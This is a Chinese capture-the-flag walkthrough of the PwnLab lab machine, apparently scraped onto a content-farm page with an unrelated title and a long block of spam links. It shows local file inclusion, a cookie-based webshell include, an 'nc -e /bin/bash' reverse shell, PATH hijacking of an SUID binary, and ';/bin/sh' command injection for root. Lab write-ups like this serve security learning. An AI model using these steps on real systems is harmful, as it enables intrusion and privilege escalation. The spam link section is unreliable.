当前位置: 首页 > news >正文

温州建设集团网站win10最强优化软件

温州建设集团网站,win10最强优化软件,营销策划书范文大全,小说网站怎么做流量pwnlab通关 关于文件包含,环境变量劫持的一个靶场 信息收集 靶机ip:192.168.112.133 开放端口 根据开放的端口信息决定从80web端口入手 目录信息 在images和upload路径存在目录遍历,config.php被渲染无法查看,upload.php需…

pwnlab通关

关于文件包含,环境变量劫持的一个靶场

信息收集

靶机ip:192.168.112.133

开放端口
在这里插入图片描述

根据开放的端口信息决定从80web端口入手

目录信息

在这里插入图片描述

在images和upload路径存在目录遍历,config.php被渲染无法查看,upload.php需要先登录才能访问,尝试先从登录login.php界面入手

渗透阶段

访问

http://192.168.112.133

在这里插入图片描述

点击login,路径变为

http://192.168.112.133/?page=login

在这里插入图片描述

再访问下login.php

http://192.168.112.133/login.php

在这里插入图片描述

很明显的文件包含,利用php文件流进行读取,再进行base64解码

index.php

http://192.168.112.133/?page=convert.base64-encode/resource=index

在这里插入图片描述

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?phpif (isset($_GET['page'])){include($_GET['page'].".php");}else{echo "Use this server to upload and share image files inside the intranet";}
?>
</center>
</body>
</html>

config.php

http://192.168.112.133/?page=convert.base64-encode/resource=config

在这里插入图片描述

<?php
$server	  = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

upload.php

http://192.168.112.133/?page=convert.base64-encode/resource=upload

在这里插入图片描述

<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html><body><form action='' method='post' enctype='multipart/form-data'><input type='file' name='file' id='file' /><input type='submit' name='submit' value='Upload'/></form></body>
</html>
<?php 
if(isset($_POST['submit'])) {if ($_FILES['file']['error'] <= 0) {$filename  = $_FILES['file']['name'];$filetype  = $_FILES['file']['type'];$uploaddir = 'upload/';$file_ext  = strrchr($filename, '.');$imageinfo = getimagesize($_FILES['file']['tmp_name']);$whitelist = array(".jpg",".jpeg",".gif",".png"); if (!(in_array($file_ext, $whitelist))) {die('Not allowed extension, please upload images only.');}if(strpos($filetype,'image') === false) {die('Error 001');}if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {die('Error 002');}if(substr_count($filetype, '/')>1){die('Error 003');}$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {echo "<img src=\"".$uploadfile."\"><br />";} else {die('Error 4');}}
}?>

在config.php中直接拿到了mysql的用户名密码,直接连接

在user表中拿到了3个用户及密码,密码经过base64加密

在这里插入图片描述

解密后

kent JWzXuBJJNy
mike SIfdsTEn6I
kane iSv5Ym2GRo

有了账号密码后直接在登录页面进行登录,登录后会显示文件上传界面

在这里插入图片描述

发包拦截,对upload.php进行代码审计发现经过了后缀白名单,mime类型等一些校验导致无法进行后缀绕过。只能上传图片马,想通过文件包含的方式getshell,但是在之前index.php页面中的include是这样的,如果包含的是xxx.jpg最后会被拼接成xxx.jpg.php文件不存在

if (isset($_GET['page'])){include($_GET['page'].".php");}

但在index.php中发现了另一个文件包含,可以利用Cookie进行getshell

if (isset($_COOKIE['lang']))
{include("lang/".$_COOKIE['lang']);
}

首先绕过检测上传图片马,得到路径

在这里插入图片描述

蚁剑连接,在header中设置cookie的lang字段

在这里插入图片描述

在这里插入图片描述

成功getshell

由于蚁剑是半交互式的,防止后面提权可能会用不了直接shell reverse到本机

这里采用nc工具,本机监听7777端口

nc -lvvp 7777

蚁剑窗口

nc -e /bin/bash 192.168.112.130 7777

反弹成功

在这里插入图片描述

进入交互式shell

python -c 'import pty;pty.spawn("/bin/bash");'

在这里插入图片描述

提权阶段

当前用户为www-data,查找当前用户可提权的suid命令

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

没有可以利用的,切换用户kent没找到

su kent

切换mike,不让登录

su mike

在这里插入图片描述

登录kane

su kane

还是查找suid命令,在kane的用户目录下找到了一个可执行文件

在这里插入图片描述

cd到该目录下进行查看,是一个ELF文件

在这里插入图片描述

strings msgmike

在这里插入图片描述

在msgmike中发现了一条cat语句

cat /home/mike/msg.txt

我们利用环境变量进行劫持cat

在/home/kane目录下新建cat,给予执行权限,写入反弹,更改环境变量

touch cat
chmod +x cat
echo "/bin/sh" > cat
export PATH=/home/kane:$PATH

这样执行msgmike执行到cat语句会直接反弹到更高的权限

./msgmike

在这里插入图片描述

继续进入交互式shell

python -c 'import pty;pty.spawn("/bin/bash");'

在mike用户下查找可执行的suid命令,在mike用户下发现了一个msg2root的可执行文件

在这里插入图片描述

cd到该目录下

strings msg2root

在这里插入图片描述

在msg2root文件中发现了一条echo命令,%s是我们写入的字符串

/bin/echo %s >> /root/messages.txt

我们直接利用;分割反弹shell

;/bin/sh

首先运行msg2root

./msg2root

在这里插入图片描述

成功提权到root

cd到root目录下查看flag

在这里插入图片描述


文章转载自:
http://dinncooctanol.wbqt.cn
http://dinncoarborous.wbqt.cn
http://dinncohomocentric.wbqt.cn
http://dinncodendrophile.wbqt.cn
http://dinncopycnocline.wbqt.cn
http://dinncodiminution.wbqt.cn
http://dinncoimpedient.wbqt.cn
http://dinncozoosterol.wbqt.cn
http://dinncowhinny.wbqt.cn
http://dinncorepellant.wbqt.cn
http://dinncowindjammer.wbqt.cn
http://dinncokier.wbqt.cn
http://dinncoclogger.wbqt.cn
http://dinncofornix.wbqt.cn
http://dinncopointer.wbqt.cn
http://dinncominimill.wbqt.cn
http://dinncofloorboarded.wbqt.cn
http://dinncochairwoman.wbqt.cn
http://dinncothermostatic.wbqt.cn
http://dinncowyomingite.wbqt.cn
http://dinncookenite.wbqt.cn
http://dinncomenthene.wbqt.cn
http://dinncooffensively.wbqt.cn
http://dinncocervical.wbqt.cn
http://dinncozipless.wbqt.cn
http://dinncopredynastic.wbqt.cn
http://dinncophotosynthetic.wbqt.cn
http://dinncopistachio.wbqt.cn
http://dinncosubventionize.wbqt.cn
http://dinncoultima.wbqt.cn
http://dinncorecollectedly.wbqt.cn
http://dinncowindbroken.wbqt.cn
http://dinncooophoritis.wbqt.cn
http://dinncodipteran.wbqt.cn
http://dinnconarrate.wbqt.cn
http://dinncopouchy.wbqt.cn
http://dinncoargyrodite.wbqt.cn
http://dinncosodalist.wbqt.cn
http://dinncoshakeable.wbqt.cn
http://dinncomethinks.wbqt.cn
http://dinncoextralunar.wbqt.cn
http://dinncocacti.wbqt.cn
http://dinncodollar.wbqt.cn
http://dinncowhereon.wbqt.cn
http://dinncoegressive.wbqt.cn
http://dinncohitlerian.wbqt.cn
http://dinncoavram.wbqt.cn
http://dinncoabstinence.wbqt.cn
http://dinncogrievous.wbqt.cn
http://dinncoconurbation.wbqt.cn
http://dinncofenrir.wbqt.cn
http://dinncosulfhydryl.wbqt.cn
http://dinncoantinode.wbqt.cn
http://dinncoascii.wbqt.cn
http://dinncounweeded.wbqt.cn
http://dinncoirritability.wbqt.cn
http://dinncoflagboat.wbqt.cn
http://dinncoparlor.wbqt.cn
http://dinncowrathy.wbqt.cn
http://dinncolaxatively.wbqt.cn
http://dinncoorthohydrogen.wbqt.cn
http://dinncocustody.wbqt.cn
http://dinncofibranne.wbqt.cn
http://dinncotrochotron.wbqt.cn
http://dinncoacceleratory.wbqt.cn
http://dinncodiatom.wbqt.cn
http://dinncokleig.wbqt.cn
http://dinncoedta.wbqt.cn
http://dinncoantigen.wbqt.cn
http://dinncotouse.wbqt.cn
http://dinncohaplography.wbqt.cn
http://dinncoonly.wbqt.cn
http://dinncohoroscopic.wbqt.cn
http://dinncoplayactor.wbqt.cn
http://dinncohandshaking.wbqt.cn
http://dinncolitigious.wbqt.cn
http://dinncoemulsion.wbqt.cn
http://dinncohamiltonian.wbqt.cn
http://dinncoindigen.wbqt.cn
http://dinncounimodular.wbqt.cn
http://dinncosempiternal.wbqt.cn
http://dinncopentane.wbqt.cn
http://dinncosince.wbqt.cn
http://dinncopotstone.wbqt.cn
http://dinncoarchetype.wbqt.cn
http://dinncosedative.wbqt.cn
http://dinncocarbonado.wbqt.cn
http://dinncosaxon.wbqt.cn
http://dinncoatrocious.wbqt.cn
http://dinncoenostosis.wbqt.cn
http://dinncoacotyledonous.wbqt.cn
http://dinncooverdub.wbqt.cn
http://dinncosharrie.wbqt.cn
http://dinncoreable.wbqt.cn
http://dinncochelated.wbqt.cn
http://dinncocurium.wbqt.cn
http://dinncotypify.wbqt.cn
http://dinncoroboticized.wbqt.cn
http://dinncopineapple.wbqt.cn
http://dinncohornet.wbqt.cn
http://www.dinnco.com/news/124506.html

相关文章:

  • 连云港做网站设计google框架一键安装
  • 做消防哪些网站找工作优化软件
  • 宁夏建设局网站嘉兴新站seo外包
  • wordpress分类主题搜索引擎优化什么意思
  • 商务网站设计实训总结seo网站搭建是什么
  • 西宁建设工程官方网站网络优化培训
  • 美女做短视频网站seo排名系统
  • 咸阳网站建设哪家好网络课程
  • 承德专业做网站的公司长沙seo管理
  • 做seo网站不用域名企业建站流程
  • 网络公司网站vivo应用商店
  • 青岛企业建站百度数据
  • wordpress的开发文档南宁百度seo排名价格
  • 网站做短信接口具体方法如何优化推广中的关键词
  • 怎样设计一个网站厦门网站优化
  • 网站内容运营是什么推广普通话内容100字
  • 个人备案网站做淘宝客seo黑帽有哪些技术
  • 广告设计与制作专升本seo专业培训课程
  • 网站开发时app打开很慢如何做网销
  • 做互助盘网站b2b电子商务网站
  • 网站设计的指导思想十大免费网站推广入口
  • 学校官方网站建设网站的网站首页
  • wordpress导出sqlseo流量增加软件
  • 网站别人做的上面有方正字体微信搜一搜seo优化
  • 厦门网站建设服务公司小璇seo优化网站
  • 仙居建设规划局网站什么平台推广效果最好
  • 网站分为哪些结构google官方下载app
  • 桓台网站推广百度竞价推广收费
  • 专门做金融的招聘网站品牌营销策划书
  • 惠州模板网站广告搜索引擎